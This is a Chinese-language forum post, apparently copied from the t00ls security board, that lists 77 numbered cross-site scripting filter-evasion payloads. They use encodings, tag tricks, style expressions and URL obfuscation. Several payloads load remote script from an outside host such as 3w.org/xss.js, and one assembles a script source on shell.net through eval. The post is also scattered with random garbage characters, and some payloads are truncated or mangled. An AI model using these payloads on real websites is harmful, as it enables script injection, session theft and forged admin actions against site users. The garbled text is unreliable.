貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 b/ X" z6 e, v4 R7 \4 ~8 {/ j(1)普通的XSS JavaScript注入' x! t: a+ x7 _5 a
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; o' K. ?' a( O7 s: g* Q% u* n
(2)IMG标签XSS使用JavaScript命令. d1 `7 [; B$ v6 P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 L! l8 s8 |% y0 z) b5 D8 H/ X
(3)IMG标签无分号无引号
4 A4 V1 `% y4 b8 A<IMG SRC=javascript:alert(‘XSS’)>
6 Q8 j9 b! O' a0 I4 q(4)IMG标签大小写不敏感3 ?- m+ P! \& \+ \
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ @9 w# X; ^. I+ z& S; a
(5)HTML编码(必须有分号) R4 m8 S5 ~9 z- X3 t3 r8 u
<IMG SRC=javascript:alert(“XSS”)>
2 Z; l& N8 }5 s& M5 w(6)修正缺陷IMG标签# ]& m( ?5 L7 `+ [% _# F
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>" _# {: f/ @5 K- K
, q& d4 W. t( l& H6 l1 }7 a% i! B3 U3 e8 ~( i! S+ P! R
(7)formCharCode标签(计算器)2 k# q; e1 [ F, O
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. u I( M' d& _& p, f(8)UTF-8的Unicode编码(计算器)
$ D. ^0 s3 T( }& P0 Z<IMG SRC=jav..省略..S')>( M9 j3 V) Q- Z1 [% b i- v% C
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ d" X2 {/ F8 e
<IMG SRC=jav..省略..S')>
8 i. J2 Y4 [! ^- _, u/ }! ?(10)十六进制编码也是没有分号(计算器). i) ?' D) c2 |; R! ]) E3 q
<IMG SRC=java..省略..XSS')>4 Y: j; N! S# H; Z0 N
(11)嵌入式标签,将Javascript分开
1 z; ~6 \4 G- y! r( N" U<IMG SRC=”jav ascript:alert(‘XSS’);”>
U' P0 X- a: i R' J(12)嵌入式编码标签,将Javascript分开1 O6 F* l- Z7 S/ U% {
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 ^$ G9 R* }7 m7 y5 }' |6 q- @9 m
(13)嵌入式换行符
2 Q0 u' m2 `: m+ _<IMG SRC=”jav ascript:alert(‘XSS’);”># R" w+ Z3 {, ~! t& l
(14)嵌入式回车5 }1 r- f: E7 K* F; E$ Z
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ R" u! A/ D2 c2 w7 z0 ~9 ^ S/ y
(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 r8 m& d7 _* U: S' i
<IMG SRC=”javascript:alert(‘XSS‘)”>
- X' G& |$ D7 B" w- Q(16)解决限制字符(要求同页面)
/ B, o4 j9 J- z1 f0 S H<script>z=’document.’</script>
E+ |. n, |: ^<script>z=z+’write(“‘</script>
9 h) S3 ^( y, G<script>z=z+’<script’</script>
1 P6 x0 d$ l, U* H* O O) ]<script>z=z+’ src=ht’</script>7 _: s0 `. }& \) P! O
<script>z=z+’tp://ww’</script>2 N4 x4 h; |1 L& r: p( Y
<script>z=z+’w.shell’</script>
2 I- L; W1 T) z$ \4 f<script>z=z+’.net/1.’</script>
9 Q" `$ q" Y8 g( q# N, V<script>z=z+’js></sc’</script>4 G% r$ A. M( ~/ F# j- B" @* ?
<script>z=z+’ript>”)’</script>
/ u4 R2 ]2 p9 _) K( L<script>eval_r(z)</script>) j, t: W% O7 o- u3 Z0 ]1 X
(17)空字符12-7-1 T00LS - Powered by Discuz! Board4 x5 T, y9 ?4 D
https://www.t00ls.net/viewthread ... table&tid=15267 2/66 Y) H1 i6 R: L8 G& {+ o
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out: Q+ Y* ]3 g; z# l- Q
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
- @) P2 h5 w# P, ~perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out- n$ o2 ]) ~. \+ J! t7 w
(19)Spaces和meta前的IMG标签- U: ?0 f0 z) |6 W+ |
<IMG SRC=” javascript:alert(‘XSS’);”>. ]+ ~; r3 |& w: u9 m
(20)Non-alpha-non-digit XSS
) I2 M/ O h) ~: o2 Q& l<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. }9 U* H$ [9 F3 V" }- z
(21)Non-alpha-non-digit XSS to 2
' b: h6 r, O% C* P! I<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
7 f. C+ Z N3 V$ L: n" k(22)Non-alpha-non-digit XSS to 3
& a. p) S; _2 w4 m3 ^<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. r7 a$ b' |3 q# f& {7 n(23)双开括号8 [* A3 n8 W @1 n9 u. }/ [0 X" d
<<SCRIPT>alert(“XSS”);//<</SCRIPT>2 I4 [5 x" e, D, o5 e
(24)无结束脚本标记(仅火狐等浏览器)
+ G* ]' U' D: y$ R8 j4 J( ]<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ k* {8 n, D6 |" f
(25)无结束脚本标记2
( o% Z9 N* `& x" t<SCRIPT SRC=//3w.org/XSS/xss.js>
4 d. f, F0 [4 e; n- \$ R" g6 ?(26)半开的HTML/JavaScript XSS
) s# j) V5 D2 @% e* t) s1 y0 o<IMG SRC=”javascript:alert(‘XSS’)”+ R" q% y+ q# F! j# Q! w
(27)双开角括号+ t4 F9 [# s, Y' ]6 |( M& b
<iframe src=http://3w.org/XSS.html <
9 R; m, E7 {( D7 p, ]1 A: m" d' S(28)无单引号 双引号 分号
4 }% o$ ~6 d2 b2 X5 b6 d) s2 W<SCRIPT>a=/XSS/
7 m" s7 R9 r0 F* Kalert(a.source)</SCRIPT>( ]0 h4 _/ H4 `+ M" q4 ?8 \ j
(29)换码过滤的JavaScript, T; o0 {9 l M: r/ M' D
\”;alert(‘XSS’);//
/ Y: L. M1 ~% p+ }, O4 G* T(30)结束Title标签7 J4 d% W- N1 ^, C( _
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 r9 @/ u, P$ [9 i) Z( A9 v1 r(31)Input Image1 p8 W$ u% B4 g8 k
<INPUT SRC=”javascript:alert(‘XSS’);”># C' `5 L% ~+ b& Z- P6 p4 E
(32)BODY Image0 L6 z8 ?/ P+ q* X! [9 ~9 U3 h
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
; v0 ?/ [- O0 B8 {% Z# o(33)BODY标签* |7 d6 C8 J9 {4 ?
<BODY(‘XSS’)>. G7 y" ?" t2 i* b( l
(34)IMG Dynsrc
- U& H8 Z3 ^9 B0 v8 C<IMG DYNSRC=”javascript:alert(‘XSS’)”>. B: ^( R( i( e; \% ^
(35)IMG Lowsrc! W& K) F# u0 _0 w5 H _ G
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
: {/ N& f% X9 ^ N3 b(36)BGSOUND" @& |- f j1 k) G, L' p, x
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
0 [' t/ {* U6 C( {! u+ \! _" i! }(37)STYLE sheet1 v) f% B3 |: C- b
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>4 d6 E8 C; h6 C* y- H. t
(38)远程样式表
$ g+ d% B- C# h1 @% z) K% L<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) s' U) O* z8 Q! V7 U(39)List-style-image(列表式)% ?0 L8 v0 g/ l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" H' Y$ F7 g$ j i& q% p- q5 c5 r(40)IMG VBscript
: c1 `, Q" M* x, l6 A<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS, X/ s: w1 R8 {6 P8 O
(41)META链接url
% T: L( e" U. y# `: @3 X$ O5 y& G% C/ I; s% K) B
# r" L3 n" u$ _4 X3 s- m1 t
<META HTTP-EQUIV=”refresh” CONTENT=”0; M( u6 D% n% E1 s( p
URL=http://;URL=javascript:alert(‘XSS’);”>. n3 O- M% x& D$ g3 F! F2 j0 @& O
(42)Iframe& J6 r, G3 H; h8 Q8 [$ k5 _
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>3 J" H, a. U$ M/ V
(43)Frame8 c5 Q0 q; [: f. k0 z+ t4 O) {* ]
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board3 k1 M1 h7 h% h7 T6 t
https://www.t00ls.net/viewthread ... table&tid=15267 3/6, S5 j0 e* P9 I! |$ ~0 K
(44)Table# r0 t' u7 H1 I( x9 n4 D/ C
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ Y) F, |4 g% s, e5 g" P, Q(45)TD& t( Z6 J; D7 |" d# ? A$ G; N
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) a ~6 F0 m3 e. d+ Z' U2 |: d(46)DIV background-image
+ l! g5 I6 k6 s* G7 H<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
]: X) `! f- B u' r1 i(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-+ N4 Z0 D- H! A- p- v
8&13&12288&65279)1 D( a! Z2 g( h
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ ^: ?! M5 f4 D, d8 R6 c+ Y(48)DIV expression
+ Z" R* i$ t! R9 H& s! T<DIV STYLE=”width: expression_r(alert(‘XSS’));”>! X d: d2 o, ~$ F/ _" f s- s
(49)STYLE属性分拆表达
" n# k% M8 ` X" }0 V8 ^<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ z/ O/ d5 x$ h% j# @* M(50)匿名STYLE(组成:开角号和一个字母开头)
' ?- n0 E8 o+ i" M& j9 q/ y/ @<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>8 ?! R/ r" g2 j; j; o
(51)STYLE background-image9 J- c" i3 X) H0 a l6 `7 {
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A3 Q7 } Z8 r8 z' _5 F3 P
CLASS=XSS></A>$ ?& c0 n, R2 F* {2 N7 I
(52)IMG STYLE方式1 m6 S7 ]: o) q
exppression(alert(“XSS”))’>* d% K4 X6 i* P; S- Q3 ]* m
(53)STYLE background
6 x3 G0 `, V) g5 I1 u0 q8 D<STYLE><STYLE
' w( Q. _5 r# D0 A5 @$ ~3 t% l* ltype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% a" ]% u r; g(54)BASE- O) g7 i1 {4 D0 a' S( W$ x
<BASE HREF=”javascript:alert(‘XSS’);//”>
. n2 e; m. [. ~2 h4 a$ f2 u$ ]3 B; O(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! x8 o, _% M1 P) ?# D
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
7 U+ ?# } G9 d: q5 ~, [% E(56)在flash中使用ActionScrpt可以混进你XSS的代码6 U5 ?6 _" L! z& ?9 I# g
a=”get”;
`6 s4 b8 K; z- q ^% ab=”URL(\”";
# J2 F! y6 _. fc=”javascript:”;* O+ L1 K" m7 z' I* |% q
d=”alert(‘XSS’);\”)”;
4 }' l& r) f, R# x7 feval_r(a+b+c+d);
+ E& A! u2 ^7 |(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
: j/ t- c! s$ }+ m<HTML xmlns:xss>
2 I7 D3 u8 q$ q- c4 Z<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
+ w! I, k7 S% U" @7 x# j' `<xss:xss>XSS</xss:xss>
: o6 Q1 n* B2 i</HTML>
' k+ E: z9 q! C) K: H7 t(58)如果过滤了你的JS你可以在图片里添加JS代码来利用; `& b/ h) r4 W; `" _3 e R
<SCRIPT SRC=””></SCRIPT>
, S. u0 l$ o8 F(59)IMG嵌入式命令,可执行任意命令
8 ^5 U# T# c/ H' y5 _( |, Y<IMG SRC=”http://www.XXX.com/a.php?a=b”>) i6 o; Y4 R9 b& ~0 a
(60)IMG嵌入式命令(a.jpg在同服务器)
W" \ p! w& U2 L" d/ G3 y7 wRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser0 F1 w/ Z8 ^; ?% J. p
(61)绕符号过滤
, G; C3 u" G0 l4 I7 p+ g; f<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' i6 E# k2 F+ Z, m- n(62)8 Y7 j3 T/ ?. X% a" n: a9 u
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 l( i( y) S* Y4 {5 j(63)
, i. p# c* ]2 Q( e! J<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! z( I2 K2 G7 x# f
(64)' x( Z1 k3 B2 J0 ?
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>" b# Q$ v7 j q t' S6 m; {- W
(65)
& v; q) t! T+ r4 a8 p. Z<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ g9 y6 b! p; z6 @9 ?6 m
(66)12-7-1 T00LS - Powered by Discuz! Board
- }$ h7 m5 }9 h* f$ e4 Rhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
9 @# ?# w( ^6 ^$ U: x3 E" t6 k& E3 ^<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 B8 S4 |: r" n: c2 V9 \" D(67)
, X R9 g: x3 K+ j8 i<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>$ }2 K, x q7 C3 C+ d2 a
</SCRIPT>$ S4 e" ]9 k0 ]7 O5 j. _
(68)URL绕行
1 b @# }6 b5 t; }2 T- J<A HREF=”http://127.0.0.1/”>XSS</A>& k Y1 n# }1 A1 i8 }+ r
(69)URL编码
' ~" D% z: {6 s3 V9 b) l<A HREF=”http://3w.org”>XSS</A>! g7 c+ ^0 v9 ]6 @
(70)IP十进制8 {- X9 V. L4 P' M; u
<A HREF=”http://3232235521″>XSS</A>
% m) f0 G7 B+ J0 o3 o: B# X(71)IP十六进制
( A5 ~% P) @5 L4 A: K3 {: ]* J4 P<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
: k4 b! @' W9 j: i" j3 A% R(72)IP八进制
" a/ R1 A% D/ h0 q<A HREF=”http://0300.0250.0000.0001″>XSS</A>
6 P5 e' B. s# Z4 c' D) a$ W) H(73)混合编码
& A' s$ T8 x! O1 C<A HREF=”h
% ]7 n( c6 j/ J! u; Htt p://6 6.000146.0×7.147/”">XSS</A>
' x8 r) l+ R' c(74)节省[http:]
2 o3 G/ K$ s& T* _. P<A HREF=”//www.google.com/”>XSS</A>
7 R3 U0 u0 u( e/ \" i- J' G2 C7 b(75)节省[www]6 X' I8 B, ]1 q+ ^4 k
<A HREF=”http://google.com/”>XSS</A>+ B# m4 m, y$ ?9 ^2 S2 G7 L0 |
(76)绝对点绝对DNS
4 T. y0 L& b/ W) k# D<A HREF=”http://www.google.com./”>XSS</A>+ h4 x8 ^) k( c7 ~
(77)javascript链接) O2 S7 R) f/ y1 n
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
6 J% T+ w8 U; ~) `0 L- Q$ Z h0 x9 J& }; _$ m5 A
原文地址:http://fuzzexp.org/u/0day/?p=14+ g7 Q9 Y+ f$ c, w" B! D# ^6 G
9 c& [5 ?! Y4 |9 c
|